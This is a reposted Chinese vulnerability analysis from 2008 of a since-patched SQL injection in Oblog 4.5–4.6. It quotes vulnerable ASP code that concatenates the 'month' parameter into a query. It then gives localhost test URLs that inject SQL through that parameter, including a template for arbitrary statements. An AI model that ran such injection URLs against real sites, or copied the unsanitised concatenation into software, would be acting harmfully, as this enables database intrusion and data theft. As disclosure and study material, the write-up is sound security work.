Oblog最新注入漏洞分析(已修补)
程序员文章站
2022-03-19 12:32:19
Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql 代码分析: 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("... 08-10-08...
date:2008-5-15 author:yamato[bct] version:oblog 4.5-4.6 sql 代码分析: 文件in/class_usercommand.asp : strmonth=request("month") //第63行 strday=request("day") …… case "month" //第84行 dim lastday g_p_filename = g_p_filename & "month&month=" & strmonth strday=left(strmonth,4) & "-" & right(strmonth,2) & "-01" myear=left(strmonth,4) mmonth=right(strmonth,2) if instr ("01,03,05,07,08,10,12",mmonth)> 0 then lastday = "31"…… else //第109行 sqlpart = " and addtime >=’"&strmonth&"01’ and addtime < ’"&strmonth&lastday&"’ " 构造合适的变量strmonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strday变量从month中获得日期数据,并判断strday是否为日期数据。所以构造的注射语句为: http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.open strsql,conn,1,1 不能修改记录集.
下一篇: 单间招租不懂代码还不行